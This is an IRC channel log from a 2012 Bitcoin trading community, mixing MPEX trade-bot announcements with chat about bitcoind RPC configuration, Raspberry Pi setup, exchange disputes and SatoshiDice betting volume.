19:11:14 teh suck, dieing for xmas. Dec 23 19:11:15 i enjoy food sometimes, but most of the time its just to stop my belly from complaining Dec 23 19:11:33 would be easier to plug myself to 230v Dec 23 19:11:43 those are my 2 favorite things kakobrekla Dec 23 19:11:46 i love cooking, and i love eating. i'm like an italian Dec 23 19:11:52 i tried that a couple of times Dec 23 19:11:53 [MPEX] [S.MPOE] 10391 @ 0.00062 = 6.4424 BTC [+] Dec 23 19:11:55 but i just got shocked Dec 23 19:12:39 kakobrekla: i think you may need to do connect=127.0.0.1 in bitcoind.conf i dont remember Dec 23 19:12:51 rpconnect= i mean Dec 23 19:12:55 hummm Dec 23 19:13:11 i thought it was just about wallet.dat path Dec 23 19:13:30 which is same iirc Dec 23 19:13:30 uh oh using bitcoind and bitcoin-qt with the same wallet? NOPE. Dec 23 19:13:41 not at same time Dec 23 19:13:49 rpcconnect= Dec 23 19:13:50 one or another Dec 23 19:14:01 hm Dec 23 19:14:22 accually if i get the latest client workin on ubuntu ... it has a console built in Dec 23 19:14:25 so which is the next btc scam ? Dec 23 19:14:32 mpex Dec 23 19:14:33 you'll end up maintaining 2 copies of blockchain. bitcoin-qt is NOT a thin client afaik. Dec 23 19:15:01 hm Dec 23 19:15:07 pigeons ill bet you a dolla. Dec 23 19:15:09 but armory runs on top of bitcoind iirc? Dec 23 19:15:25 armory uses bitcoind for blockchain Dec 23 19:15:46 just blockchain files' Dec 23 19:15:48 ah. Dec 23 19:15:54 yes? armory uses bitcoind rpc interface? Dec 23 19:16:03 ah, only files Dec 23 19:16:56 why do they distribute bitcoind with bitcoin-qt if they can't share the blockchain files ?! Dec 23 19:17:50 [MPEX] [S.MPOE] 3900 @ 0.00062 = 2.418 BTC [+] Dec 23 19:18:41 seems nobody bothered to implement that (or pay to be implemented). Dec 23 19:19:10 bitcoin-gui needs to talk rpc to bitcoind, which you set by the rpcport, rpcpassword in bitcoin.conf. bitcoind needs to be started first Dec 23 19:19:23 since when? Dec 23 19:20:47 https://bitcointalk.org/index.php?topic=92929.0 Dec 23 19:21:10 oops. my google fu is weak today Dec 23 19:21:30 yea, that's it. so i ended up using bitcoind CLI exclusively Dec 23 19:21:49 jurov newest gui has cli built in Dec 23 19:21:57 checkin now if i got that on ubuntu Dec 23 19:22:16 well, that won't help you running bitcoind as service Dec 23 19:22:22 afaik bitcoin had cli since day 1 Dec 23 19:22:25 no no Dec 23 19:22:28 nope Dec 23 19:22:33 i just need access to manual commands Dec 23 19:22:36 so i can do sendfrom Dec 23 19:22:51 wxgui only before we even had bitcoind satoshi called it "headless bitcoin" Dec 23 19:23:25 i was thrilled when it came out Dec 23 19:25:00 looks like we are mixing things. using CLI embedded in bitcoin GUI is one thing. RPC calling bitcoind running in the background is compeltely different thing. Dec 23 19:25:32 ok Dec 23 19:25:39 the latter has advantage it is running all the time, it gets well connected and always ready with freshest blockchain Dec 23 19:25:45 but no gui, then Dec 23 19:25:47 right, bitcoind needs to run as a daemon, with rpcuser, rpcport, rpcpassword set in the bitcoin.conf Dec 23 19:26:12 a second bitcoind runs to connect and pass cli commands. Dec 23 19:26:40 18:25.35 ( jurov ) the latter has advantage it is running all the time, Dec 23 19:26:42 hmm Dec 23 19:26:54 i have at least 1 instace of bitcoin gui running all the time Dec 23 19:26:59 which should just be bitcoind sendfrom [minconf=1] [comment] Dec 23 19:27:12 api list --> https://en.bitcoin.it/wiki/Original_Bitcoin_client/API_Calls_list Dec 23 19:27:27 at least that was how I used to use namecoind Dec 23 19:28:50 yes, running bitcoin gui all the time is an option, too. Dec 23 19:30:55 set up new one with -datadir ./somewhere-else and -conf ./newbitcoin.conf, if it is one off. otherwise you can get gui to connect to a daemon with the correct rpc settings Dec 23 19:31:26 "can get gui to connect to a daemon with the correct rpc settings" But this is actually not supported! Dec 23 19:31:27 [MPEX] [S.MPOE] 7193 @ 0.00062 = 4.4597 BTC [+] Dec 23 19:31:43 jurov: ive done that quite a bit Dec 23 19:31:47 as in doesn't work, or devs have deprecated it? Dec 23 19:32:00 rpcconnect=127.0.0.1 Dec 23 19:32:24 never knew it wasn't supported Dec 23 19:34:05 [MPEX] [S.MPOE] 4800 @ 0.00062 = 2.976 BTC [+] Dec 23 19:35:00 nope. my 0.7.1 bitcoin-qt just ignored rpcconnect and is starting blockchain download from the very beginning Dec 23 19:35:10 hmm ok Dec 23 19:35:17 no gui here to try Dec 23 19:35:22 if it works for you i'm VERY interested Dec 23 19:35:32 [MPEX] [S.MPOE] 12500 @ 0.00062 = 7.75 BTC [+] Dec 23 19:36:21 with the same config, bitcoind works as supposed to (calls existing process via RPC) Dec 23 19:36:34 so i'm convinced it is not supported Dec 23 19:39:51 [MPEX] [S.MPOE] 6200 @ 0.00062 = 3.844 BTC [+] Dec 23 19:45:31 can someone tell me what brackets round a channel name in kvirc channel list means?? kvirc faq/website/online help are singularly unhelpful Dec 23 19:54:26 [MPEX] [S.MPOE] 5200 @ 0.00062 = 3.224 BTC [+] Dec 23 19:57:19 http://trilema.com/2012/steampunk-tower-defense/ Dec 23 19:57:45 markedathome possibly that you're disconnected ? Dec 23 19:59:24 don't think so, there is no message saying disconnected or similar. google just tends to bring up lots of programmatic info as soon as the bracket is included in query. Dec 23 20:00:06 [MPEX] [S.MPOE] 28428 @ 0.00062 = 17.6254 BTC [+] Dec 23 20:09:06 mircea_popescu: i wrote something for you Dec 23 20:10:20 is it a song? Dec 23 20:12:14 no a blog post intended to be read by mr. popescu Dec 23 20:12:56 link me Dec 23 20:16:22 [MPEX] [S.MPOE] 13646 @ 0.00062 = 8.4605 BTC [+] Dec 23 20:17:45 ill email to polimedia with your key Dec 23 20:18:11 for your eyes only Dec 23 20:19:17 hmm Dec 23 20:19:49 jurov: CoinBr.MPBPT-O, no more buys since a few days Dec 23 20:20:49 i know, with the holidays it's normal Dec 23 20:23:14 [MPEX] [S.MPOE] 11900 @ 0.00062 = 7.378 BTC [+] Dec 23 20:24:06 [MPEX] [S.MPOE] 4805 @ 0.00062 = 2.9791 BTC [+] Dec 23 20:24:34 i wonder whether it'll make it till end of month Dec 23 20:25:47 no big deal, we'll fill the rest ourselves. Dec 23 20:26:45 but i believe december 28th mpoe announcement may stir some additional interest Dec 23 20:27:45 just in case, i would invest 10 more, but wouldn't if unessesary Dec 23 20:29:42 jurov has inside information Dec 23 20:29:43 [MPEX] [S.MPOE] 11050 @ 0.00062 = 6.851 BTC [+] Dec 23 20:30:22 buy now Dec 23 20:30:35 manipulator! Dec 23 20:31:15 aas yoiu have seen, it may well backfire, like in case of fabianb :D Dec 23 20:33:41 like, you have it all covered? oh, no need to invest, then. lol Dec 23 20:37:06 [MPEX] [O.BTCUSD.C150T] 520 @ 0.01498159 = 7.7904 BTC [-] Dec 23 20:37:18 https://btct.co/ <-- down for anyone else? Dec 23 20:37:21 [MPEX] [O.BTCUSD.C110T] 800 @ 0.16843117 = 134.7449 BTC [-] Dec 23 20:37:39 [MPEX] [O.BTCUSD.C130T] 700 @ 0.05981764 = 41.8723 BTC [-] Dec 23 20:37:39 quit DoSin the comptetition ukto Dec 23 20:37:46 pigeons: nah Dec 23 20:37:48 [MPEX] [O.BTCUSD.C120T] 500 @ 0.09645259 = 48.2263 BTC [-] Dec 23 20:38:05 is that the actual issue? Dec 23 20:38:27 maybe they use bitvps Dec 23 20:38:29 BF hasnt had any trades lately. was kind of curious what btct's history looked like Dec 23 20:38:32 lol Dec 23 20:47:58 [MPEX] [S.MPOE] 5094 @ 0.00062 = 3.1583 BTC [+] Dec 23 20:50:19 [MPEX] [S.MPOE] 2203 @ 0.00062 = 1.3659 BTC [+] Dec 23 20:55:38 [MPEX] [S.MPOE] 2550 @ 0.00062 = 1.581 BTC [+] Dec 23 21:00:07 [MPEX] [S.MPOE] 14500 @ 0.00062 = 8.99 BTC [+] Dec 23 21:01:06 [MPEX] [S.MPOE] 10000 @ 0.00062 = 6.2 BTC [+] Dec 23 21:02:29 [MPEX] [S.MPOE] 13090 @ 0.00062 = 8.1158 BTC [+] Dec 23 21:04:13 oh yeah btct Dec 23 21:04:20 so many its hard to keep up Dec 23 21:04:59 [MPEX] [S.MPOE] 25650 @ 0.00062 = 15.903 BTC [+] Dec 23 21:05:31 added that currently non workin link Dec 23 21:06:19 i think that coveres all now Dec 23 21:07:15 lol Dec 23 21:07:29 btc x-mas Dec 23 21:08:34 [MPEX] [S.MPOE] 3090 @ 0.00062 = 1.9158 BTC [+] Dec 23 21:13:37 [MPEX] [S.MPOE] 5300 @ 0.00062 = 3.286 BTC [+] Dec 23 21:13:38 maybe btct is working like slovak tax office - for some time their server was shut down outside working hours Dec 23 21:17:08 lol Dec 23 21:18:04 well its says "working hours" on the door doesnt it!? Dec 23 21:18:20 zactly. Dec 23 21:21:06 well, real world stock exchanges aren't better :) Dec 23 21:23:46 [07:11:40] Diablo-D3: I posted the last known usagi portfolio content to your https://bitcointalk.org/index.php?topic=132961.0 Dec 23 21:23:55 [07:12:17] this was from hes web site but it was probably not updated. Only way to find out, what he really had, was ask James for a copy. Dec 23 21:25:05 http://i.imgur.com/hQ9ex.jpg Dec 23 21:25:34 jurov: heee Dec 23 21:25:44 EskimoBob: so why doesnt he just say what the fuck the email is Dec 23 21:27:30 its the mental attitude Dec 23 21:29:34 [MPEX] [S.MPOE] 5550 @ 0.00062 = 3.441 BTC [+] Dec 23 21:32:07 Ukto: bf still not in assbot? Dec 23 21:32:27 i have no control over it Dec 23 21:32:58 I was told to make twatter feed. I did. then I was told it was obsoleted. end of story. Dec 23 21:33:34 kakobrekla: assbot doesn't like twitter streams anymore? Dec 23 21:34:06 FabianB_: the issue apaprently Dec 23 21:34:18 is that twitter will drop updates Dec 23 21:34:22 and is not accurate Dec 23 21:34:59 so I guess when I release the API for BF, he will just adhear to that Dec 23 21:35:06 doesn't need to be 100% if it's just > irc Dec 23 21:35:22 yeah, i only made the twatter feed for itc heh Dec 23 21:35:24 irc Dec 23 21:41:21 Ukto: yeah, just make a stupid telnet api Dec 23 21:41:37 lol Dec 23 21:41:51 you can do it with like a dozen lines of perl Dec 23 21:42:09 json far easier an faster Dec 23 21:42:19 I think you missed the point Dec 23 21:42:31 you can stream the json over telnet Dec 23 21:42:55 hell, you could run your own irc bot Dec 23 21:43:15 thought about it, but not worth the time/effort atm Dec 23 21:43:21 i have more important things I am working on atm Dec 23 21:43:25 [MPEX] [S.MPOE] 3050 @ 0.00062 = 1.891 BTC [+] Dec 23 21:43:27 well, what you'd do is Dec 23 21:43:27 than getting trades to show in irc Dec 23 21:43:33 use existing perl irc bot modules Dec 23 21:43:50 would rather focus on gett the api system finished to publishing Dec 23 21:44:05 lsat real major thing the system needs Dec 23 21:44:12 and then call a remote api in the daemon from your trade api AFTER its closed the http request Dec 23 21:44:15 to do the push Dec 23 21:52:39 [MPEX] [S.MPOE] 12250 @ 0.00062 = 7.595 BTC [+] Dec 23 21:53:34 EskimoBob: usagi bitched at me in pm on the forum Dec 23 21:53:54 EskimoBob: Ive asked him to either tell the world what the email address is or give me permission to Dec 23 21:56:13 [MPEX] [S.MPOE] 8700 @ 0.00062 = 5.394 BTC [+] Dec 23 22:01:59 Diablo-D3: is usagi having more trouble? Dec 23 22:02:13 thestringpuller: he refuses to own up which email is his in the claims list Dec 23 22:02:34 he owes me 21 btc Dec 23 22:02:46 [MPEX] [S.DICE] 200 @ 0.00325183 = 0.6504 BTC [+] Dec 23 22:02:47 [MPEX] [S.DICE] 950 @ 0.00326868 = 3.1052 BTC [+] Dec 23 22:03:31 so i am wondering how much trouvle he is in Dec 23 22:03:35 trouble Dec 23 22:05:53 EskimoBob: and that does what exactly? Dec 23 22:08:21 EskimoBob: he still refuses to tell me. Dec 23 22:09:08 yes Dec 23 22:09:16 I have no clue. Dec 23 22:09:23 I intend on processing all of them anyhow Dec 23 22:09:35 FabianB_: theres a custom api now since twitter prooved to be unreliable even with the workarounds Dec 23 22:09:37 all he has to do is confirm an address on the list Dec 23 22:10:52 it doesnt matter, I want him to confirm it. Dec 23 22:11:39 [MPEX] [S.MPOE] 8250 @ 0.00062 = 5.115 BTC [+] Dec 23 22:12:48 kakobrekla: so you'll use the custom APIs of exchanges and integrate it in assbot? or do exchanges use assbot's custom api? Dec 23 22:12:59 a what? Dec 23 22:13:31 exchanges post stuff into assbot Dec 23 22:13:43 Im pretty sure google is not telling me what I want to know Dec 23 22:14:01 huh, I guess google is relevant Dec 23 22:14:08 EskimoBob: the term you're looking for is troll, I think Dec 23 22:15:50 seriously, why the fuck wont he just say what the email is Dec 23 22:15:55 if he really did claim them, then whats the issue Dec 23 22:17:59 [MPEX] [S.MPOE] 5050 @ 0.00062 = 3.131 BTC [+] Dec 23 22:22:25 [MPEX] [S.MPOE] 11800 @ 0.00062 = 7.316 BTC [+] Dec 23 22:24:05 [MPEX] [S.DICE] 1022 @ 0.00329733 = 3.3699 BTC [+] Dec 23 22:24:06 [MPEX] [S.DICE] 578 @ 0.00332944 = 1.9244 BTC [+] Dec 23 22:29:59 [MPEX] [S.MPOE] 4950 @ 0.00062 = 3.069 BTC [+] Dec 23 22:39:19 [MPEX] [S.MPOE] 6425 @ 0.00062 = 3.9835 BTC [+] Dec 23 22:53:41 Diablo-D3, I recalled he told that long ago and when I saw the email glbseuser@hotmail.com I asked him and he confirmed. Dec 23 22:54:24 There's no way it's not him, he knew the shares for that email before it was disclosed. Dec 23 22:55:22 [MPEX] [S.MPOE] 2900 @ 0.00062 = 1.798 BTC [+] Dec 23 22:55:24 It also match what he had before in his spreadsheet. Dec 23 23:03:35 [MPEX] [S.MPOE] 18668 @ 0.00062 = 11.5742 BTC [+] Dec 23 23:08:42 someone familiar with raspberry pi Dec 23 23:11:51 [MPEX] [S.MPOE] 9938 @ 0.00062 = 6.1616 BTC [+] Dec 23 23:18:47 on? It will not start up, I have a pre-programmed sd card, all is right from RS Dec 23 23:19:15 I just received it in the mail yestreday Dec 23 23:19:23 so probably rev 2 Dec 23 23:20:07 i got a black screen and nothing seems to happen Dec 23 23:20:38 I should be capable of doing that with the use od diskimager Dec 23 23:20:43 of Dec 23 23:22:00 but i ordered a pre-programmed sd card with it, so it should work properly Dec 23 23:22:15 thanks Dec 23 23:23:46 probably this is the case: Dec 23 23:23:48 The Raspberry Pi cannot find a valid image on the SD card. Check card is inserted correctly. Check that you have correctly written a Raspberry Pi image to the card. Did you have admin rights when you used the SD-card writer software? Without it the software might go through the motions without actually doing anything! To check if the writing process did actually happen Insert the SD card into a Windows machine and you s Dec 23 23:23:49 hould see bootcode.bin, fixup.dat and start.elf amongst others. See also, Known SD Cards. It is also possible that the image you are writing to the card is corrupt, as downloads do occasionally end up corrupted or truncated. You can check with the checksum utility if your download is correct. Dec 23 23:24:53 I checked the card and it has the named files in it Dec 23 23:26:54 thats the case but it should not be, the sd card is from RS and pre-programmed, sucky company Dec 23 23:27:45 tomorrow Ill buy a new sd card and flash it with the downloaded raspberry software Dec 23 23:28:07 If that wont work, I will sell the pi Dec 23 23:29:10 I have a fast one from RS, a sd hc Dec 23 23:29:17 class 6 Dec 23 23:29:38 but probably they fk`d up flashing it Dec 23 23:35:10 does the size of the sd card matter? I have a 4GB from RS and I can buy a 16GB sd hc class 10 for 12eur Dec 23 23:39:02 and a brand like samsung or a cheap one like lexar Dec 23 23:39:28 ok a brand Dec 23 23:39:58 a samsung 8GB sd hc class 6 cost 16eur Dec 23 23:41:36 PsychoticBoy: just buy the highest class that works with your device Dec 23 23:41:56 class == speed Dec 23 23:42:12 high class/ good brand Dec 23 23:43:17 I hate expensive Dec 23 23:43:47 I am not a linux man, I bought the pi to learn linux etc Dec 23 23:44:12 I have a monste windows machine Dec 23 23:44:16 monster Dec 23 23:45:07 you know, you can just run a vm Dec 23 23:45:23 just dont buy shi brands, dude Dec 23 23:45:29 samsung is fine Dec 23 23:46:12 I will buy the best zi can and make my wallet cry Dec 23 23:46:46 wow Dec 23 23:46:59 I think this may be the first time Ive ever ran my own miner long enough to get 10k accepts Dec 23 23:47:05 I wonder what'll happen Dec 23 23:47:53 nothing, my miner has accepted almost 4M shares and still no pot of gold Dec 23 23:48:55 hahahah oh man Dec 23 23:49:00 usagi isnow bitching about the 5btc Dec 23 23:58:33 I'm not a linux man either =/ Dec 24 00:03:49 [MPEX] [S.MPOE] 9250 @ 0.00062 = 5.735 BTC [+] Dec 24 00:09:00 I am now writing the new debian for raspberry to the sd card delivered by RS, EskimoBob Dec 24 00:11:25 [MPEX] [S.MPOE] 5500 @ 0.00062 = 3.41 BTC [+] Dec 24 00:13:40 whoehoe its working Dec 24 00:15:07 [MPEX] [S.MPOE] 6300 @ 0.00062 = 3.906 BTC [+] Dec 24 00:22:29 I am in the OS yoepie Dec 24 00:22:47 now lets seee hmmmn what does this button do??? Dec 24 00:24:08 [MPEX] [S.MPOE] 11917 @ 0.00062 = 7.3885 BTC [+] Dec 24 00:27:49 Now that I loged out and back in the prompt, can I just shut him off now Dec 24 00:32:30 [MPEX] [S.MPOE] 9200 @ 0.00062 = 5.704 BTC [+] Dec 24 00:55:03 PsychoticBoy: what was wrong? Dec 24 00:56:52 oh, I think I know - it is possible that the firmware files may have been for the 256MB version, though you still should have had something. Dec 24 00:57:09 my pi comes to me in less than 36hrs :-) Dec 24 01:00:49 I have flashed the sd card and now all is fine, was probably the 512mb issue Dec 24 01:03:40 [MPEX] [S.MPOE] 2600 @ 0.00062 = 1.612 BTC [+] Dec 24 01:15:52 [MPEX] [S.MPOE] 9801 @ 0.00062 = 6.0766 BTC [+] Dec 24 01:19:35 [MPEX] [S.MPOE] 8300 @ 0.00062 = 5.146 BTC [+] Dec 24 01:27:23 [MPEX] [S.MPOE] 19500 @ 0.00062 = 12.09 BTC [+] Dec 24 01:37:00 [MPEX] [S.MPOE] 11600 @ 0.00062 = 7.192 BTC [+] Dec 24 01:39:29 [MPEX] [S.MPOE] 9350 @ 0.00062 = 5.797 BTC [+] Dec 24 01:41:08 [MPEX] [S.MPOE] 3800 @ 0.00062 = 2.356 BTC [+] Dec 24 01:54:04 [MPEX] [O.BTCUSD.C130T] 1 @ 0.05816915 BTC [-] Dec 24 02:00:07 [MPEX] [S.MPOE] 3200 @ 0.00062 = 1.984 BTC [+] Dec 24 02:07:15 anybody out there Dec 24 02:10:15 https://soundcloud.com/djleo/bitcoin-the-money-of-the-future-2 Dec 24 02:10:25 [MPEX] [S.MPOE] 8650 @ 0.00062 = 5.363 BTC [+] Dec 24 02:20:09 [MPEX] [S.MPOE] 8436 @ 0.00062 = 5.2303 BTC [+] Dec 24 02:34:03 [MPEX] [S.MPOE] 9710 @ 0.00062 = 6.0202 BTC [+] Dec 24 02:39:58 [MPEX] [S.DICE] 172 @ 0.00332944 = 0.5727 BTC [+] Dec 24 02:39:59 [MPEX] [S.DICE] 428 @ 0.00333047 = 1.4254 BTC [+] Dec 24 02:42:00 [MPEX] [S.MPOE] 47852 @ 0.00062 = 29.6682 BTC [+] Dec 24 02:44:57 [MPEX] [S.MPOE] 11133 @ 0.00062 = 6.9025 BTC [+] Dec 24 02:47:22 anyone want to buy a $100 settlement? Dec 24 02:50:04 the check is due to arrive sometime in January, and I need the money before the end of December Dec 24 02:57:22 [MPEX] [S.MPOE] 4500 @ 0.00062 = 2.79 BTC [+] Dec 24 03:04:34 WhateverIFeelLik: I might buy for 1.6 btc Dec 24 03:04:50 ;;getrating WhateverIFeelLik Dec 24 03:04:51 Currently authenticated from hostmask WhateverIFeelLik!44071d66@gateway/web/freenode/ip.68.7.29.102 . User WhateverIFeelLik, rated since Sun Sep 9 21:02:35 2012. Cumulative rating 2, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 1 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=WhateverIFeelLik Dec 24 03:07:53 I need at least $50 from the sale Dec 24 03:08:18 the smallest BTCPak available is for $100 Dec 24 03:12:09 ;;ticker Dec 24 03:12:09 BTCUSD ticker | Best bid: 13.30221, Best ask: 13.39849, Bid-ask spread: 0.09628, Last trade: 13.30007, 24 hour volume: 14733.54087893, 24 hour low: 13.10200, 24 hour high: 13.40000, 24 hour vwap: 13.26361 Dec 24 03:16:33 [MPEX] [S.MPOE] 7100 @ 0.00062 = 4.402 BTC [+] Dec 24 03:29:03 [MPEX] [O.BTCUSD.P130T] 1 @ 0.04420246 BTC [-] Dec 24 03:37:48 [MPEX] [S.MPOE] 6050 @ 0.00062 = 3.751 BTC [+] Dec 24 03:44:44 [MPEX] [O.BTCUSD.C140T] 1 @ 0.03020824 BTC [-] Dec 24 03:45:02 [MPEX] [S.MPOE] 12067 @ 0.00062 = 7.4815 BTC [+] Dec 24 03:53:07 [MPEX] [S.MPOE] 1400 @ 0.00062 = 0.868 BTC [+] Dec 24 04:22:22 [MPEX] [S.MPOE] 5744 @ 0.00062 = 3.5613 BTC [+] Dec 24 04:29:47 [MPEX] [O.BTCUSD.C140T] 1 @ 0.03005227 BTC [-] Dec 24 04:29:52 [MPEX] [S.MPOE] 4092 @ 0.00062 = 2.537 BTC [+] Dec 24 04:33:05 [MPEX] [S.MPOE] 7250 @ 0.00062 = 4.495 BTC [+] Dec 24 04:46:50 [MPEX] [S.MPOE] 6800 @ 0.00062 = 4.216 BTC [+] Dec 24 04:47:21 [MPEX] [O.BTCUSD.C140T] 1 @ 0.02997932 BTC [-] Dec 24 04:52:19 ;;ticker Dec 24 04:52:20 BTCUSD ticker | Best bid: 13.37001, Best ask: 13.38990, Bid-ask spread: 0.01989, Last trade: 13.37001, 24 hour volume: 14793.72595714, 24 hour low: 13.10200, 24 hour high: 13.45000, 24 hour vwap: 13.27754 Dec 24 04:52:26 ;;bc,24hprc Dec 24 04:52:27 13.25 Dec 24 04:57:26 [MPEX] [S.MPOE] 14350 @ 0.00062 = 8.897 BTC [+] Dec 24 05:17:13 [MPEX] [S.MPOE] 7775 @ 0.00062 = 4.8205 BTC [+] Dec 24 05:24:52 [MPEX] [S.MPOE] 4800 @ 0.00062 = 2.976 BTC [+] **** BEGIN LOGGING AT Mon Dec 24 13:17:13 2012 Dec 24 13:22:02 [MPEX] [S.MPOE] 6950 @ 0.00062 = 4.309 BTC [+] Dec 24 13:24:39 [MPEX] [S.MPOE] 2850 @ 0.00062 = 1.767 BTC [+] Dec 24 14:15:34 Ukto: on weex, how do i know a gpg key got added? don't want to lock myself out by switching to gpg auth without it accepting my public key Dec 24 14:46:55 [MPEX] [S.MPOE] 2000 @ 0.00062 = 1.24 BTC [+] Dec 24 15:00:10 [MPEX] [S.MPOE] 22000 @ 0.00062 = 13.64 BTC [+] Dec 24 15:02:47 mircea_popescu: is there a "text" (machine-friendly) version of mpex? Dec 24 15:06:15 that's funny cause some people keep asking him if there is a human-friendly version Dec 24 15:12:09 [MPEX] [S.MPOE] 13610 @ 0.00062 = 8.4382 BTC [+] Dec 24 15:12:28 well, a more machine-friendly version would allow third-parties to build a more human-friendly version Dec 24 15:14:04 sgnb you just don't set the html parameter and it answers in plaintext Dec 24 15:14:10 or do you mean the data displayed on the site ? Dec 24 15:14:20 mircea_popescu: the latter Dec 24 15:14:27 a, yes. Dec 24 15:14:45 FabianB: let me check for you Dec 24 15:14:45 http://mpex.co/faq.html#11 Dec 24 15:15:01 prices and mkt depth json Dec 24 15:15:17 a lot richer than the site actually. Dec 24 15:15:25 oh Dec 24 15:15:29 didn't see this one Dec 24 15:15:41 great, thanks Dec 24 15:15:44 np Dec 24 15:16:42 mircea_popescu: btw, http://validator.w3.org/check?uri=http%3A%2F%2Fmpex.co%2F%3Fmpsic%3DS.MPOE&charset=%28detect+automatically%29&doctype=Inline&group=0&user-agent=W3C_Validator%2F1.3 Dec 24 15:16:50 hehe Dec 24 15:17:09 the old page said something like "validation comes up with 1k errors which is a source of great satisfaction to us" Dec 24 15:17:49 and used to drive ne0futur crazy Dec 24 15:23:03 so a friendlier interface would actually interest people? Dec 24 15:23:51 people claim it would, but i suspect they are just whining Dec 24 15:23:55 still less than google Dec 24 15:23:55 http://validator.w3.org/check?uri=google.com&charset=%28detect+automatically%29&doctype=Inline&group=0&user-agent=W3C_Validator%2F1.3 Dec 24 15:24:18 there is a friendly interface via coinbr.com Dec 24 15:27:14 [MPEX] [S.MPOE] 1815 @ 0.00062 = 1.1253 BTC [+] Dec 24 15:30:09 well, it's yet another trusted third-party to add... it should be possible to make a purely web-based client to plain mpex so that its failure doesn't let the user screwed (à la blockchain.info) Dec 24 15:31:07 it certainly is possible Dec 24 15:33:52 so none exists yet and it would interest people? Dec 24 15:38:03 how much it would interest people is probably unknown Dec 24 15:38:15 Ukto: pm Dec 24 15:46:26 [MPEX] [S.MPOE] 16100 @ 0.00062 = 9.982 BTC [+] Dec 24 15:57:37 [MPEX] [S.MPOE] 5628 @ 0.00062 = 3.4894 BTC [+] Dec 24 16:02:44 [MPEX] [S.MPOE] 10700 @ 0.00062 = 6.634 BTC [+] Dec 24 16:10:24 [MPEX] [S.MPOE] 7250 @ 0.00062 = 4.495 BTC [+] Dec 24 16:14:40 [MPEX] [S.MPOE] 4000 @ 0.00062 = 2.48 BTC [+] Dec 24 16:17:23 [MPEX] [S.MPOE] 13349 @ 0.00062 = 8.2764 BTC [+] Dec 24 16:17:42 ;;rate Ukto 1 runs bitfunder and weexchange which supports gpg authentication, very nice Dec 24 16:17:43 Rating entry successful. Your rating of 1 for user Ukto has been recorded. Dec 24 16:19:26 very nice, how much? Dec 24 16:22:23 hey ukto maybe you can get this one https://btct.co/security/BMF Dec 24 16:22:59 usagis? Dec 24 16:23:14 :) Dec 24 16:23:51 [MPEX] [S.MPOE] 7350 @ 0.00062 = 4.557 BTC [+] Dec 24 16:24:02 https://bitcointalk.org/index.php?topic=130754.msg1415181#msg1415181 Dec 24 16:24:03 :) Dec 24 16:24:58 " Dec 24 16:24:58 Q: Why was I gone for a month? Dec 24 16:25:01 By the way. The night that GLBSE shutdown I happened to be drinking. So I finished the bottle and I got really sick. This apparently lowered my immune system and I got some kind of very bad stomach flu." Dec 24 16:25:14 yeah Dec 24 16:25:15 that was hilarious Dec 24 16:25:29 lololwhat Dec 24 16:25:31 "I this makes you all happy" or w/e Dec 24 16:25:32 urlpls Dec 24 16:26:34 https://bitcointalk.org/index.php?topic=126560.msg1343180#msg1343180 Dec 24 16:26:44 .. that one >,> :P Dec 24 16:26:51 ukto added gpg to bf ? Dec 24 16:27:11 mircea_popescu: no, weexchange Dec 24 16:27:17 o Dec 24 16:27:41 mircea_popescu: but the wallet of bf is handled by weex Dec 24 16:27:46 right. Dec 24 16:27:55 anyway. so it can be done!1eleven. whodda thunk it. Dec 24 16:28:54 mircea_popescu: WeExchange has had gpg for a year now Dec 24 16:28:56 :P Dec 24 16:29:17 somehow i had no idea. Dec 24 16:29:22 well good for you! Dec 24 16:29:28 prolyl cause almost no one knows of weexchange :P Dec 24 16:29:55 :p Dec 24 16:30:45 hey guys, pirate is back, he was just drinking the last time we saw him and got realy sick Dec 24 16:30:55 stomach flu ? Dec 24 16:31:00 LOL Dec 24 16:31:57 some heavy shit to drink. Dec 24 16:32:04 milk ? Dec 24 16:32:09 sour. Dec 24 16:32:55 i just had a pint of buttermilk Dec 24 16:32:59 "I am interested in hiring an accountant, although smickles is probably out of Dec 24 16:33:02 the question" Dec 24 16:33:52 [MPEX] [S.MPOE] 7063 @ 0.00062 = 4.3791 BTC [+] Dec 24 16:34:05 http://www.youtube.com/watch?v=5QRVbEQogDk Dec 24 16:35:07 https://bitcointalk.org/index.php?topic=133139.0 Dec 24 16:35:15 guess usagi took burnsides bribe :P Dec 24 16:37:39 ugh Dec 24 16:37:44 more usagi Dec 24 16:38:21 He asked to use BF for BMF.. i debating it for a while,told him fine, as long as he actually pays ppl properly Dec 24 16:38:22 we're running low on drama JWU42 Dec 24 16:38:25 then eh went to btct Dec 24 16:38:33 and setup, after i set him up on BF Dec 24 16:38:34 outside of usagi and eskimobob there's precious little left. Dec 24 16:38:47 which hes now being turned down @ btct.co Dec 24 16:38:52 so I am going to shut down his BF assset Dec 24 16:38:52 :P Dec 24 16:39:49 i'm actually suprised they are even voting against usagi on btct Dec 24 16:40:07 look under motions Dec 24 16:40:11 he just wants to use it to liquidate Dec 24 16:41:59 *giggle* https://bitcointalk.org/index.php?topic=130754.msg1418195#msg1418195 Dec 24 16:43:24 anyway, a "fund" of "mining bonds" doesn't seem like the best idea right now Dec 24 16:44:00 "Why the "Bitcoin Mining Sector"? because we believe it is the most stable and largest sector in the community right now." Dec 24 16:45:28 LOL Dec 24 16:47:50 ah give the christmas gift of humor Dec 24 16:47:55 https://bitcointalk.org/index.php?topic=126560.msg1417151#msg1417151 Dec 24 16:51:21 ah he put it up https://btct.co/security/SILVER Dec 24 17:02:26 [MPEX] [S.MPOE] 2500 @ 0.00062 = 1.55 BTC [+] Dec 24 17:08:36 [MPEX] [S.MPOE] 6300 @ 0.00062 = 3.906 BTC [+] Dec 24 17:16:56 MASSIVE betting volume on S.DICE in the last few hours Dec 24 17:17:08 >50,000 Dec 24 17:24:49 Biggest betting volume ever for S.DICE this morning Dec 24 17:25:43 the guy who shorted it is hoping to break the bank Dec 24 17:26:01 well Dec 24 17:26:12 2500 BTC proft this morning so far Dec 24 17:26:20 on >55,000 BTC bet Dec 24 17:26:31 nice Dec 24 17:28:08 http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL Dec 24 17:35:35 [MPEX] [S.MPOE] 3950 @ 0.00062 = 2.449 BTC [+] Dec 24 17:48:14 [MPEX] [S.MPOE] 2000 @ 0.00062 = 1.24 BTC [+] Dec 24 17:49:11 Still going. And now they are on a hot streak Dec 24 17:50:00 58000 bet and S.DICE only up 100 Dec 24 17:58:27 Bugpowder_ heh. maybe it ends up +20k or some insane shit. Dec 24 18:01:49 Hope so 